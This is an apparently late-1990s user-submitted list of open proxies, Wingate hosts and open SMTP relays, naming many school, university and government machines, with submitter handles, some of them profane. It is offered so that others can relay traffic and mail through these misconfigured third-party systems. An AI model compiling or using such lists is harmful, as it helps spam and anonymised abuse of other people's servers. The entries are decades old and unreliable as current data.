proxyd.emirates.net.ae port 194.170. [latency: 11/06/99 03:19:22 EST]
proxy.elender.hu port 3128 [latency: 11/06/99 01:22:42 EST by sex]
205.151.225.201 port 80 [latency: 11/06/99 00:08:34 EST by sexy]
gw1.ksu.edu.sa port 80 [latency: 11/06/99 00:06:52 EST by sexy_girl]
203.108.0.58 port 80 [latency: 11/05/99 23:49:57 EST]
bess-proxy.ncocc.ohio.gov port 8972 [latency: 11/05/99 00:58:23 EST]
194.143.243.244 port 35727 [latency: 11/04/99 18:44:01 EST by Joe Black77]
bess-proxy.ncocc.ohio.gov port 8972 [latency: 11/04/99 16:42:54 EST]
dakar-35.interware.hu port 81 [latency: 11/04/99 06:49:04 EST by DEALER]
zip-translator.dna.affrc.go.jp port 30001 [latency: 11/04/99 03:36:27 EST]
andele.cs.tu-berlin.de port 80 [latency: 11/03/99 18:31:55 EST]
austra6.lnk.telstra.net port 8080 [latency: 11/03/99 18:30:14 EST]
proxy.elender.hu port 3128 [latency: 11/03/99 16:57:37 EST by fogman]
192.54.193.137 port 8080 [latency: 11/03/99 10:53:23 EST]
203.140.129.10 port 8080 [latency: 11/03/99 08:42:16 EST by neron]
fuckyou.com port 3169 [latency: 11/02/99 20:34:19 EST by huhu]
proxy.elender.hu port port 3128 [latency: 11/02/99 18:08:53 EST]
proxy.marin.k12.ca.us port 80 [latency: 11/02/99 16:54:05 EST by mnc]
proxy.iitk.ac.in port 1080 [latency: 11/02/99 15:11:26 EST]
aol.com port 8080 [latency: 11/02/99 05:49:12 EST by 80]
proxy.prodigy.net port 8080 [latency: 11/02/99 05:47:49 EST by 8080]
j56.lbn.jaring.my port 80 [latency: 11/02/99 05:44:56 EST by 80]
proxy.inea.net.ar port 80 [latency: 11/02/99 02:25:46 EST by The Desconocido]
proxy.fibertel.com.ar port 80 [latency: 11/02/99 02:22:48 EST by The Desconocido]
andele.cs.tu-berlin.de port 80 [latency: 11/02/99 01:52:54 EST]
sps.net.sa port 8080 [latency: 11/02/99 01:19:24 EST]
hymn.iinet.net.au (203.59.24.165 port 1080 [latency: 11/01/99 07:40:53 EST]
info.fh-konstanz.de port 81 [latency: 10/31/99 18:58:41 EST by ghg]
gw1.ksu.edu.sa port 80 [latency: 10/31/99 15:04:12 EST]
proxy1.emirates.net.ae port 8080 [latency: 10/31/99 14:51:02 EST by wajahat]
bess-proxy.ncocc.ohio.gov port 8972 [latency: 10/31/99 12:52:28 EST]
proxy.bih.net.ba port 8080 [latency: 10/31/99 11:42:46 EST by Gorazdak]
24.4.29.247 port 1080 [latency: 10/31/99 03:12:56 EST by [NuT]]
cache.csi.com.ph port 3128 [latency: 10/30/99 21:43:49 EDT by Violet]
proxy.elender.hu port 3128 [latency: 10/30/99 18:52:36 EDT]
4.18.141.3 port 3128 [latency: 10/30/99 13:44:48 EDT by juninhO]
212.26.18.21 45975 port 45975 [latency: 10/30/99 05:40:29 EDT]
dakar-35.interware.hu port 81 [latency: 10/29/99 18:41:27 EDT by McMester]
195.56.12.254 port 3128 [latency: 10/29/99 17:14:30 EDT]
andele.cs.tu-berlin.de port 80 [latency: 10/29/99 17:10:01 EDT by sam]
200.21.200.38 port 8080 [latency: 10/29/99 10:07:58 EDT by juninhO]
strontia3.harza.com port 80 [latency: 10/29/99 10:04:39 EDT by juninhO]
iol.it port 8080 [latency: 10/29/99 10:01:25 EDT by juninho]
199.203.4.5 port 80 [latency: 10/29/99 05:55:44 EDT by Uriah||Heep_]
proxy.lasipalatsi.fi port 8080 [latency: 10/29/99 02:35:19 EDT by Tse]
proxy.sinectis.com.ar port 80 [latency: 10/28/99 10:10:01 EDT by DrAkE]
203.20.76.4 port 8080 [latency: 10/28/99 05:12:23 EDT by moha]
dinmamma.com port 8080 [latency: 10/28/99 04:43:48 EDT by néron]
ftp.agozar.com port 12345 [latency: 10/27/99 21:18:32 EDT]
sea.plugcom.ru port 80 [latency: 10/27/99 19:37:11 EDT by Tosik]
cache.dux.ru port 80 [latency: 10/27/99 19:36:33 EDT by Tosik]
203.108.0.56 port 80 [latency: 10/27/99 16:26:46 EDT by bio-e->]
gw1.ksu.edu.sa port 80 [latency: 10/27/99 13:32:26 EDT by Zorro Guy]
202.160.12.31 port 80 [latency: 10/27/99 08:23:51 EDT by aCee]
203.16.61.104 port 25 [latency: 10/27/99 05:02:58 EDT by johne@ (Fuck U!)]
info.fh-konstanz.de port 81 [latency: 10/26/99 12:07:36 EDT by essam]
lpwa.com port 8000 [latency: 10/26/99 09:47:29 EDT]
193.219.28.134 port 8080 [latency: 10/26/99 05:09:20 EDT]
cache.bt.net port 3128 [latency: 10/25/99 15:06:57 EDT]
205.237.246.45 port 3128 [latency: 10/25/99 14:21:48 EDT by Two`KooL]
dinmamma.com port 8080 [latency: 10/25/99 05:39:10 EDT by minmamma]
onion-router.nrl.navy.mil port 9200 [latency: 10/25/99 03:11:40 EDT by l4m3r]
206.138.230.239 port 6667 [latency: 10/25/99 01:16:49 EDT by Dolban]
200.49.32.141 port 1408 [latency: 10/25/99 00:02:12 EDT by PZIP]
proxy4.emirates.net.ae port 8080 [latency: 10/24/99 19:56:50 EDT by fuck to etesalat]
proxy.anet.net.sa port 8080 [latency: 10/24/99 17:19:54 EDT by aldasher]
195.92.194.42 port 80 [latency: 10/24/99 12:33:32 EDT by Peter]
210.145.146.146 port 8080 [latency: 10/23/99 23:09:41 EDT by cowhead2000]
203.140.129.10 port 8080 [latency: 10/23/99 23:08:18 EDT by cowhead2000]
dakar-35.interware.hu port 81 [latency: 10/23/99 19:14:27 EDT by Dyne]
proxy.ozemail.com.au port 8080 [latency: 10/23/99 13:33:09 EDT]
194.182.97.2 port 80 [latency: 10/23/99 13:29:28 EDT by jim]
lpwa.com port 8000 [latency: 10/23/99 09:20:35 EDT by FrEaKeD -=undernet=-]
210.154.98.61 port 1080 [latency: 10/23/99 08:53:55 EDT]
210.154.98.61 port 1080 [latency: 10/23/99 01:42:21 EDT by Dormidon]
204.81.0.20 port 80 [latency: 10/22/99 21:53:41 EDT]
hamster.slip.net port 8080 [latency: 10/22/99 20:05:09 EDT by m0loch]
[ Wingates ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ebrahim.cjb.net [latency: 11/17/99 15:22:48 EST by tissetass]
ppp23-davao.mozcom.com [latency: 11/17/99 15:22:04 EST by tiss]
dns.gincorp.co.jp [latency: 11/17/99 15:21:08 EST by tissetass]
kodama.rs-eng.co.jp [latency: 11/17/99 15:19:21 EST by tissetass]
irc.ro.org [latency: 11/17/99 14:23:01 EST by little_devil]
kryptocrew.de [latency: 11/17/99 14:21:32 EST by little_devil]
rayoflight.net [latency: 11/17/99 14:20:15 EST by little_devil]
razer.base.org [latency: 11/17/99 14:19:21 EST by little_devil]
dramanetclub.gr [latency: 11/17/99 14:18:50 EST by little_devil]
cecchetto.it [latency: 11/17/99 14:18:12 EST by little_devil]
ircko.webjump.com [latency: 11/17/99 14:15:36 EST by little_devil]
mystic.oltenia.ro [latency: 11/17/99 14:14:21 EST by little_devil]
ppp-21-124-87.libero.it [latency: 11/17/99 14:10:58 EST by little_devil]
161.142.104.145 [latency: 11/16/99 21:56:34 EST by Tok_Gaj
ah]
fernwo.lnk.telstra.net [latency: 11/16/99 20:40:27 EST by sandoc]
austco1.lnk.telstra.net [latency: 11/16/99 20:38:46 EST by sandoc]
ppp1.mohammadia.mtds.com [latency: 11/16/99 18:27:56 EST by sandoc]
proxy.sol.com.br [latency: 11/16/99 18:13:04 EST by sandoc]
brutt.dsl.xmission.com [latency: 11/16/99 17:50:09 EST by sandoc]
d103.as0.clev.oh.voyager.net [latency: 11/16/99 17:34:29 EST by sandoc]
165-246.tr.cgocable.ca [latency: 11/16/99 17:30:53 EST by sandoc]
modem-as112-143.netone.com.tr [latency: 11/16/99 17:20:37 EST by sandoc]
firewall.lc.cc.il.us [latency: 11/16/99 17:17:08 EST by sandoc]
merida0202.infosel.net.mx [latency: 11/16/99 16:57:47 EST by sandoc]
62.82.236.75 [latency: 11/16/99 08:50:25 EST by dugloo]
161.142.104.234 [latency: 11/16/99 08:41:00 EST by dugloo]
142.165.136.90 [latency: 11/16/99 08:38:31 EST by dugloo]
carver.ocs.k12.al.us [latency: 11/16/99 05:26:51 EST by dugloo]
j51.kch16.jaring.my [latency: 11/16/99 05:08:53 EST by dugloo]
ns.uss.br [latency: 11/16/99 05:08:02 EST by dugloo]
j40.kgr.jaring.my [latency: 11/16/99 05:05:44 EST by dugloo]
ns1.mitsubishi-seibi.ac.jp [latency: 11/16/99 04:57:18 EST by dugloo]
pd128.katowice.ppp.tpnet.pl [latency: 11/16/99 04:55:19 EST by dugloo]
altona.lnk.telstra.net [latency: 11/16/99 04:54:59 EST by dugloo]
Reims-10-108.abo.wanadoo.fr [latency: 11/16/99 04:54:23 EST by dugloo]
mail.tbccorp.com [latency: 11/16/99 04:50:19 EST by dugloo]
mail.wingsink.com [latency: 11/16/99 04:47:08 EST by dugloo]
ppp07-cab.mozcom.com [latency: 11/16/99 04:45:08 EST by dugloo]
server.arthouse.ie [latency: 11/16/99 04:42:33 EST by dugloo]
ppp-128-144.terra.net.lb [latency: 11/16/99 04:40:56 EST by dugloo]
hoydalar.fo [latency: 11/16/99 04:38:09 EST by dugloo]
PPP-188-163.bng.vsnl.net.in [latency: 11/16/99 04:35:20 EST by dugloo]
dajenkin.ozemail.com.au [latency: 11/16/99 04:31:30 EST by dugloo]
ns.elaso.cz [latency: 11/16/99 04:19:41 EST by dugloo]
tb-249.compass.com.ph [latency: 11/16/99 04:18:33 EST by dugloo]
j53.mlk32.jaring.my [latency: 11/16/99 04:17:37 EST by dugloo]
l2tp-178.awalnet.net.sa [latency: 11/16/99 04:15:39 EST by dugloo]
202.58.254.124 [latency: 11/16/99 04:14:45 EST by dugloo]
mometal.com [latency: 11/16/99 04:14:01 EST by dugloo]
austra6.lnk.telstra.net [latency: 11/16/99 04:13:25 EST by dugloo]
ppp23-davao.mozcom.com [latency: 11/16/99 04:10:10 EST by dugloo]
asy28.as02.bak1.superonline.com [latency: 11/16/99 04:08:14 EST by dugloo]
j4.bkj23.jaring.my [latency: 11/16/99 04:07:04 EST by dugloo]
mail1.bikesusa.com [latency: 11/16/99 04:05:05 EST by dugloo]
ns.uss.br [latency: 11/16/99 04:04:06 EST by dugloo]
bioserver3.biohard.com.br [latency: 11/16/99 04:03:25 EST by dugloo]
ccps.calhoun.k12.sc.us [latency: 11/16/99 04:02:44 EST by dugloo]
oirsa.org.gt [latency: 11/16/99 03:59:53 EST by dugloo]
calnet13-47.gtecablemodem.com [latency: 11/16/99 03:58:50 EST by dugloo]
ppp5006.kems.net [latency: 11/16/99 03:39:54 EST by dugloo]
ppp25-davao.mozcom.com [latency: 11/16/99 03:37:21 EST by dugloo]
ppp00-lucena.mozcom.com [latency: 11/16/99 03:34:00 EST by dugloo]
202.58.254.131 [latency: 11/16/99 03:32:56 EST by dugloo]
ip1-79.mindgate.net [latency: 11/16/99 03:18:42 EST by dugloo]
ftp.cdrom.com [latency: 11/15/99 22:06:32 EST]
209.112.31.34 [latency: 11/15/99 17:48:36 EST by Rsnake The Bharwa]
mirror.silmarill.ru [latency: 11/15/99 17:33:16 EST by sandoc]
asy34.as01.mat1.superonline.com [latency: 11/15/99 17:27:39 EST by sandoc]
98.203.226.209.in-addr.arpa [latency: 11/15/99 05:41:07 EST by Xtian]
isdn5.pppmad.vsnl.net.in [latency: 11/15/99 05:14:52 EST by dugloo]
sja-181-45.tm.net.my [latency: 11/15/99 04:31:06 EST by dugloo]
tob24399-1.gw.connect.com.au [latency: 11/15/99 04:07:35 EST by dugloo]
rub084.pv00.lo.interbusiness.it [latency: 11/15/99 03:45:06 EST by dugloo]
206.191.93.67 [latency: 11/14/99 23:56:49 EST by fsdfdsf]
reggae-08-33.nv.iinet.net.au [latency: 11/14/99 17:56:58 EST]
shit.com [latency: 11/14/99 15:58:46 EST]
lpwa.com [latency: 11/13/99 21:13:47 EST by www.aol.com/net]
ns.elaso.cz [latency: 11/13/99 16:11:59 EST by HC_SMD Hacker_Club]
206.191.93.67 [latency: 11/13/99 02:45:22 EST]
195.98.37.11 [latency: 11/11/99 22:59:57 EST by T_Rex_]
ip108.tacoma17.wa.pub-ip.psi.net [latency: 11/11/99 19:29:04 EST]
old-micolp236.ambs.lasierra.edu [latency: 11/11/99 19:28:29 EST]
mail.unitedsd.net [latency: 11/11/99 17:43:20 EST by sandoc]
ad118-128.magix.com.sg [latency: 11/11/99 17:36:13 EST by sandoc]
pelican.city.unisa.edu.au [latency: 11/11/99 17:22:32 EST by uneek-]
rigel.barralink.com.br [latency: 11/11/99 17:21:59 EST by sandoc]
dns.tssh.co.jp [latency: 11/11/99 17:14:49 EST by sandoc]
secure.yunque.net [latency: 11/11/99 17:10:42 EST by sandoc]
mail.medikona.lt [latency: 11/11/99 17:07:22 EST by sandoc]
ntserver01.thomastonschools.org [latency: 11/11/99 17:01:55 EST by sandoc]
dns1.caps.co.jp [latency: 11/11/99 16:59:34 EST by sandoc]
oirsa.org.gt [latency: 11/11/99 16:37:24 EST by sandoc]
hawaii.rr.com [latency: 11/11/99 15:15:10 EST]
MonsterOwnzYou.com [latency: 11/11/99 13:49:08 EST by GOTO-IT!]
reggae-08-33.nv.iinet.net.au [latency: 11/11/99 04:49:24 EST]
ebrahim.cjb.net [latency: 11/10/99 12:54:10 EST by RSnake]
bugtiz.com [latency: 11/10/99 12:52:30 EST by II]
cpu1555.adsl.bellglobal.com [latency: 11/10/99 12:26:34 EST by Xtian]
interamerica.com.do [latency: 11/10/99 12:25:27 EST by Xtian]
liquid.cc [latency: 11/10/99 08:11:45 EST]
dizasta.net [latency: 11/10/99 04:05:42 EST by h4ck3d by RSnakE^]
rattle-snake.org [latency: 11/10/99 04:05:08 EST by RSnake]
alishba.com [latency: 11/10/99 03:55:38 EST by RSnake]
212.27.202.68 [latency: 11/09/99 15:28:06 EST by T_Rex]
202.21.14.234 [latency: 11/09/99 15:23:43 EST]
server.hirup.khmelnitskiy.ua [latency: 11/09/99 04:16:07 EST by frank]
202.155.3.167 [latency: 11/09/99 01:38:55 EST by Tok_Gajah]
202.155.3.187 [latency: 11/09/99 01:38:00 EST by Tok_Gajah]
shit.com [latency: 11/08/99 14:59:14 EST]
nilko.com [latency: 11/08/99 13:23:59 EST]
152.201.146 [latency: 11/08/99 10:45:42 EST by tester]
pbarray05.powerup.com.au [latency: 11/08/99 08:34:34 EST by idu]
proxy.alphanet.ro [latency: 11/07/99 22:09:35 EST by dic cerbu]
152.201.146.7 [latency: 11/07/99 07:06:28 EST]
morechat.talkcity.com [latency: 11/07/99 07:05:47 EST]
98C99207.ipt.aol.com [latency: 11/07/99 07:05:26 EST]
cia.net [latency: 11/07/99 05:00:47 EST by Hammer]
cia.net [latency: 11/06/99 20:40:50 EST by Doktor Joint]
209.161.42.1 [latency: 11/06/99 19:56:14 EST]
1Cust92.tnt2.eugene.or.da.uu.net [latency: 11/06/99 16:05:27 EST by irc]
altona.lnk.telstra.net [latency: 11/06/99 15:12:52 EST by initd_]
mipox.vip.best.com [latency: 11/06/99 15:12:35 EST by initd_]
24.66.10.215.on.wave.home.com [latency: 11/06/99 15:12:16 EST by initd_]
wdpcbalt.wdpc.com [latency: 11/06/99 15:11:59 EST by initd_]
kodama.rs-eng.co.jp [latency: 11/06/99 15:11:31 EST by initd_]
cs9341-60.austin.rr.com [latency: 11/06/99 15:10:40 EST by initd_]
rip034.wesnet.com [latency: 11/06/99 15:10:11 EST by initd_]
d212-151-34-247.swipnet.se [latency: 11/06/99 15:09:48 EST by initd_]
burnem.lnk.telstra.net [latency: 11/06/99 15:09:27 EST by initd_]
j19.jhb31.jaring.my [latency: 11/06/99 15:09:01 EST by initd_]
212-133-161-60.sbs.net.tr [latency: 11/06/99 15:08:41 EST by initd_]
portable.static.star.net.nz [latency: 11/06/99 15:08:22 EST by initd_]
Mulhouse-8-85.abo.wanadoo.fr [latency: 11/06/99 15:08:05 EST by initd_]
165-246.tr.cgocable.ca [latency: 11/06/99 15:07:41 EST by initd_]
dt027nd2.san.rr.com [latency: 11/06/99 14:55:27 EST by RSnake]
200.45.32.71 [latency: 11/06/99 14:52:30 EST by RSnake]
193.231.207.84 [latency: 11/06/99 14:51:50 EST by RSnake]
216.209.195.128 [latency: 11/06/99 14:51:21 EST by RSnake]
139.130.80.123 [latency: 11/06/99 14:50:35 EST by RSnake]
208.222.211.65 [latency: 11/06/99 14:50:07 EST by RSnake]
ivrit.co.il [latency: 11/06/99 13:52:24 EST by Slamat]
207.25.216.56 [latency: 11/06/99 13:48:27 EST by invisibleman]
saward.lnk.telstra.net [latency: 11/05/99 17:42:18 EST by sandoc]
202.54.47.67 [latency: 11/05/99 17:34:51 EST by spacejoe]
d212-151-105-250.swipnet.se [latency: 11/05/99 17:33:12 EST by sandoc]
icqtwsrv1.maiowoo.com [latency: 11/05/99 17:29:40 EST by sandoc]
mail.ceinstruments.it [latency: 11/05/99 17:20:45 EST by sandoc]
ns0-gw.nsjnet.co.jp [latency: 11/05/99 17:19:28 EST by sandoc]
ken9029.tsukuba.accs.or.jp [latency: 11/05/99 17:15:16 EST by sandoc]
msproxy.datacom.bg [latency: 11/05/99 17:13:01 EST by sandoc]
8-22.dialup.surnet.ru [latency: 11/05/99 17:11:08 EST by sandoc]
mail.trutnov.cz [latency: 11/05/99 16:44:43 EST by sandoc]
asshole.com [latency: 11/05/99 12:02:35 EST by dd]
202.21.8.31 [latency: 11/05/99 04:44:17 EST by hola]
210.170.93.66 [latency: 11/04/99 23:17:03 EST]
Nine-Inch-Nails.Com [latency: 11/04/99 21:49:10 EST by john]
24.200.21.118 [latency: 11/04/99 17:02:11 EST by initd_]
l2tp-178.awalnet.net.sa [latency: 11/04/99 17:01:26 EST by initd_]
host13.av-el.co.il [latency: 11/04/99 16:59:54 EST by initd_]
216.72.47.70 [latency: 11/04/99 16:59:21 EST by initd_]
server.hirup.khmelnitskiy.ua [latency: 11/04/99 16:56:54 EST by initd_]
195.46.19.68 [latency: 11/04/99 16:54:56 EST by initd_]
24.200.89.3 [latency: 11/04/99 16:52:31 EST by initd_]
edtn002050.hs.telusplanet.net [latency: 11/04/99 16:51:29 EST by initd_]
dsl-148-146.tstonramp.com [latency: 11/04/99 16:50:13 EST by initd_]
200.33.131.186 [latency: 11/04/99 16:49:27 EST by initd_]
mipox.vip.best.com [latency: 11/04/99 16:48:44 EST by initd_]
mp-217-242-213.daxnet.no [latency: 11/04/99 16:48:02 EST by initd_]
sun-170-233.sunwave.net [latency: 11/04/99 16:47:23 EST by initd_]
24.200.17.163 [latency: 11/04/99 16:46:53 EST by initd_]
cor-050-b4.codetel.net.do [latency: 11/04/99 16:46:07 EST by initd_]
por539.esoterica.pt [latency: 11/04/99 16:45:53 EST by initd_]
208.14.2.179 [latency: 11/04/99 16:44:37 EST by initd_]
ppp54-182.hh.tigernet.de [latency: 11/04/99 16:43:43 EST by initd_]
216.226.237.86 [latency: 11/04/99 16:41:38 EST by initd_]
212.242.103.152 [latency: 11/04/99 16:39:48 EST by initd_]
edsl78.mpls.uswest.net [latency: 11/04/99 16:39:04 EST by initd_]
212.242.102.167 [latency: 11/04/99 16:38:41 EST by initd_]
206.172.231.24 [latency: 11/04/99 16:38:14 EST by initd_]
note.ark.ne.jp [latency: 11/04/99 16:36:54 EST by initd_]
Nine-Inch-Nails.Com [latency: 11/04/99 16:11:18 EST by Kpa[4]yN]
cyberspace.org [latency: 11/04/99 09:55:41 EST]
202.54.47.67 [latency: 11/04/99 04:49:04 EST by initd_]
202.54.47.41 [latency: 11/04/99 04:48:34 EST by initd_]
202.54.33.217 [latency: 11/04/99 04:28:16 EST by initd_]
isdn2.pppmad.vsnl.net.in [latency: 11/04/99 04:19:02 EST by initd_]
isdn3.pppmad.vsnl.net.in [latency: 11/04/99 04:18:43 EST by initd_]
202.54.4.73 [latency: 11/04/99 04:18:19 EST by initd_]
202.54.4.65 [latency: 11/04/99 04:18:02 EST by initd_]
202.54.7.165 [latency: 11/04/99 04:17:22 EST by initd_]
ns.azel.co.jp [latency: 11/03/99 20:15:38 EST by sandoc]
ccps.calhoun.k12.sc.us [latency: 11/03/99 20:11:06 EST by sandoc]
server.scheiber.sulinet.hu [latency: 11/03/99 20:10:18 EST by sandoc]
OfficeCOM-EUnet.AT.EU.net [latency: 11/03/99 20:07:21 EST by sandoc]
142.51.235.2 [latency: 11/03/99 20:03:21 EST by sandoc]
ts1-10.bbs-la.com [latency: 11/03/99 20:01:48 EST by sandoc]
proxy.utvlive.com [latency: 11/03/99 19:51:24 EST by sandoc]
169.207.63.69 [latency: 11/03/99 19:46:40 EST by sandoc]
node100f8.a2000.nl [latency: 11/03/99 19:43:54 EST by sandoc]
harken2.static.execpc.com [latency: 11/03/99 19:42:13 EST by sandoc]
c30-169.the-bridge.net [latency: 11/03/99 19:40:39 EST by sandoc]
edtn003331.hs.telusplanet.net [latency: 11/03/99 19:32:27 EST by sandoc]
mail.dspcus.com [latency: 11/03/99 19:30:26 EST by sandoc]
212.151.186.248 [latency: 11/03/99 14:34:36 EST by Quake]
ip95-105.asiaonline.net [latency: 11/03/99 04:29:40 EST by RSnake]
ppp156-dps.indosat.net.id [latency: 11/03/99 04:23:35 EST by RSnake]
212.156.139.154 [latency: 11/03/99 04:23:15 EST by RSnake]
ip29-170.cbn.net.id [latency: 11/03/99 04:18:43 EST by RSnake]
hs0680.singnet.com.sg [latency: 11/03/99 04:16:44 EST by RSnake]
expert.cc.purdue.edu [latency: 11/03/99 04:12:46 EST by RSnake]
ftp.parsonrealestate.com [latency: 11/03/99 04:11:23 EST by RSnake]
stevek.ne.mediaone.net [latency: 11/03/99 04:10:39 EST by RSnake]
mail.coolmore.com.au [latency: 11/03/99 04:10:01 EST by RSnake]
wiagate.igr.nl [latency: 11/03/99 04:09:27 EST by RSnake]
node10d01.a2000.nl [latency: 11/03/99 04:08:51 EST by RSnake]
fajalobi.ricardis.tudelft.nl [latency: 11/03/99 04:07:37 EST by RSnake]
ursus.bio.vu.nl [latency: 11/03/99 04:06:24 EST by RSnake]
161.184.149.29 [latency: 11/03/99 03:50:07 EST by RSnake]
210.196.160.99 [latency: 11/03/99 03:49:45 EST by RSnake]
200.26.103.34 [latency: 11/03/99 03:49:23 EST by RSnake]
210.15.231.57 [latency: 11/03/99 03:48:37 EST by RSnake]
202.21.8.31 [latency: 11/03/99 03:48:14 EST by RSnake]
161.184.146.34 [latency: 11/03/99 03:47:16 EST by RSnake]
hsprna1-90.sk.sympatico.ca [latency: 11/02/99 22:06:32 EST by temugin]
216.72.47.70 [latency: 11/02/99 14:28:26 EST by tmz]
a00213.sjrp.mandic.com.br [latency: 11/02/99 14:09:59 EST by ursuletz]
205.188.209.44 [latency: 11/02/99 10:20:31 EST by paula]
li-9-25.cytanet.com.cy [latency: 11/02/99 06:11:46 EST by ursuletz]
host13.image-entertainment.com [latency: 11/02/99 05:47:25 EST by ursuletz]
pm3-0-6.hm.ayrix.net [latency: 11/02/99 05:45:27 EST by ursuletz]
mail.trutnov.cz [latency: 11/02/99 05:43:29 EST by ursuletz]
server.goway.com [latency: 11/02/99 05:31:19 EST by ursuletz]
Telezimex.ro [latency: 11/02/99 05:29:24 EST by ursuletz]
interate.com.pe [latency: 11/02/99 05:28:21 EST by ursuletz]
sai0103.erols.com [latency: 11/02/99 05:23:50 EST by alex]
cx796116-a.pv1.ca.home.com [latency: 11/01/99 22:47:20 EST by ASSha]
24.5.158.92 [latency: 11/01/99 22:46:43 EST by ASSha]
202.54.6.1 [latency: 11/01/99 02:19:03 EST by test]
nilko.com [latency: 10/31/99 19:37:28 EST by SiRiUs]
battle.net [latency: 10/31/99 17:48:29 EST]
i400.zbrojovka.com [latency: 10/31/99 16:29:17 EST]
[ SMTP Relay hosts ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
mailhub.iastate.edu [latency: 11/15/99 23:15:00 EST by sara]
mailserver.collegeclub.com [latency: 11/15/99 19:39:13 EST by digicrash]
smtp2.serverdienst.de [latency: 11/15/99 10:21:06 EST by Aldi_Provider_Killer]
mailx.reseller.de [latency: 11/15/99 10:20:34 EST by Aldi_Provider_Killer]
mail.telepac.pt [latency: 11/14/99 08:39:59 EST by Volture]
smtp.prodigy.net [latency: 11/13/99 22:27:18 EST by Trac3]
email.dnet.net [latency: 11/12/99 17:59:12 EST by wayne hiatt]
smtp.rad.net.id [latency: 11/09/99 16:31:49 EST by adsf]
nuhsd.k12.ca.us [latency: 11/09/99 16:04:57 EST by The Guy]
mail.formsuk.com [latency: 11/08/99 00:11:21 EST by weirdo]
smtp.freeaccount.com [latency: 11/07/99 19:33:07 EST by Spammmer]
smtp.earthlink.net [latency: 11/07/99 19:32:01 EST by The Guy]
mail.politie.nl [latency: 11/06/99 15:15:15 EST by its a police server!]
smtp.zzn.com [latency: 11/06/99 13:55:46 EST]
smtp.netvision.net.il [latency: 11/06/99 13:54:24 EST]
XXXMOVIES.NET [latency: 11/06/99 08:33:32 EST by MADARCHOOD]
natinst.com [latency: 11/06/99 08:31:19 EST by MADARCHOOD]
rmx.mail.com [latency: 11/06/99 08:30:23 EST by RANDI]
24.28.66.142 [latency: 11/06/99 04:16:18 EST by ROMRacer]
tm.net. [latency: 11/06/99 00:41:13 EST]
Cnet.com [latency: 11/05/99 21:14:32 EST]
mail.takas.lt [latency: 11/05/99 19:57:26 EST by lansbergis]
202.186.17.4 [latency: 11/04/99 10:58:17 EST by TeNnO]
mail.ecalton.com [latency: 11/03/99 02:49:31 EST by test]
12.18.76.6 [latency: 11/02/99 13:38:06 EST]
24.5.158.92 [latency: 11/01/99 22:49:50 EST by ASSha]
cx796116-a.pv1.ca.home.com [latency: 11/01/99 22:49:08 EST by ASSha]
smtp.ix.netcom.com [latency: 10/31/99 23:35:59 EST by Cyborg Clown]
lcs.mit.edu [latency: 10/31/99 21:21:45 EST by theta]
194.126.104.175 [latency: 10/31/99 18:13:24 EST]
mail.netzero.net [latency: 10/31/99 13:30:16 EST by Kode Cypher]
mail.caen.it [latency: 10/31/99 04:47:03 EST by -KruGer-]
mail.dbu.edu [latency: 10/29/99 18:58:02 EDT by Jointt]
mail.aug.edu [latency: 10/29/99 18:56:46 EDT by Jointt]
mail.gmu.edu [latency: 10/29/99 18:52:11 EDT by Jointt]
freemail.org [latency: 10/28/99 09:17:58 EDT by tådd patherzon]
freemail.org. [latency: 10/28/99 09:17:55 EDT by tådd patherzon]
zoom.com [latency: 10/26/99 22:50:34 EDT by eeerm]
python.ussco.com [latency: 10/26/99 15:04:07 EDT]
mail.bih.net.ba [latency: 10/25/99 13:19:34 EDT by Gorazdak]
mail.fun4u.net [latency: 10/24/99 22:44:11 EDT by fun4u]
zombie.com [latency: 10/23/99 23:17:32 EDT by cowhead2000]
mail.cowheadcomputers.com [latency: 10/23/99 22:49:31 EDT by cowhead2000]
smmusd.org [latency: 10/20/99 21:59:53 EDT by Poet]
mail.itis.com [latency: 10/19/99 15:13:42 EDT by fuck you Cyberarmy y]
relay-mail.clark.net [latency: 10/19/99 14:04:12 EDT by tkdgnr8]
siamail.sia.it [latency: 10/18/99 15:05:46 EDT]
smtp.email.msn.com [latency: 10/17/99 23:38:30 EDT]
147.205.109.253 [latency: 10/17/99 19:42:35 EDT]
cache-rg01.proxy.aol.com [latency: 10/16/99 12:46:51 EDT]
sdf.lonestar.org [latency: 10/15/99 22:36:27 EDT by Psycho Bitch]
mx.01019freenet.de [latency: 10/15/99 19:50:15 EDT by jasmin]
mail.ecalton.com [latency: 10/13/99 03:17:54 EDT]
mail.daisytek.com [latency: 10/12/99 21:01:58 EDT by AntiEdie]
mail.usa.de [latency: 10/12/99 10:53:48 EDT by Sub.Xer0]
Lionhead.co.uk [latency: 10/12/99 04:43:14 EDT by DrSoloMan]
gatekeeper.collins.rockwell.com [latency: 10/12/99 00:37:13 EDT by Sauron]
smtp.bip.net [latency: 10/09/99 12:18:32 PDT]
smtp.smtp.net [latency: 10/09/99 10:48:24 PDT by GkA]
smtp.tm.net.my [latency: 10/09/99 07:57:17 PDT by EeKkS]
az-fw.azerty.com [latency: 10/08/99 17:46:22 PDT by Edie]
143.92.24.65 [latency: 10/06/99 23:37:58 PDT by brahma]
194.96.164.150 [latency: 10/06/99 16:06:39 PDT by Agent Hamel]
smtp.kabelfoon.nl [latency: 10/06/99 12:00:31 PDT]
sanborn.k12.nh.us [latency: 10/06/99 11:31:44 PDT by om3g4 sucks]
mail.ttlc.net [latency: 10/06/99 11:31:02 PDT by om3g4 sucks]
are p3E9D4CB5.dip0.t-ipconnect.d [latency: 10/04/99 22:48:41 PDT by nethe@d]
mail.bright.net [latency: 10/04/99 18:43:51 PDT by tommy]
mail.netzero.net [latency: 10/03/99 19:43:07 PDT by iceburn(pratik)]
smtp.home.se [latency: 10/03/99 13:26:18 PDT by aDreNaLinZ]
207.155.122.20 [latency: 10/03/99 01:51:39 PDT by T|rant]
216.129.5.92 [latency: 10/02/99 12:30:49 PDT by Neri]
turing.unicamp.br [latency: 09/30/99 17:22:35 PDT by - Dark Priest -]
smtp.cybercable.fr [latency: 09/29/99 03:58:31 PDT by is that me??]
ub.edu.ar [latency: 09/28/99 08:42:29 PDT by Avelino Porto]
200.39.147.18 [latency: 09/27/99 19:39:42 PDT]
mail.eexi.gr [latency: 09/27/99 11:13:56 PDT]
freemail.org.mk [latency: 09/25/99 17:17:28 PDT]
209.183.86.96 [latency: 09/25/99 11:14:46 PDT by vegan_100%]
